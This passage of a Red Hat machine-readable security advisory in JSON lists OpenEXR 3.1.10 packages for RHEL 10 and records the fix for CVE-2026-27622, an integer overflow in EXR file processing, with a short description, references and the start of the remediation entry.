"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"product_id": "openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debugsource@3.1.10-8.el10_1.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"product": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"product_id": "openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-debuginfo@3.1.10-8.el10_1.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"product": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"product_id": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-libs-debuginfo@3.1.10-8.el10_1.1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"product": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"product_id": "openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/openexr-devel@3.1.10-8.el10_1.1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.src as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.src",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.src as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.src",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-13T02:30:41+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
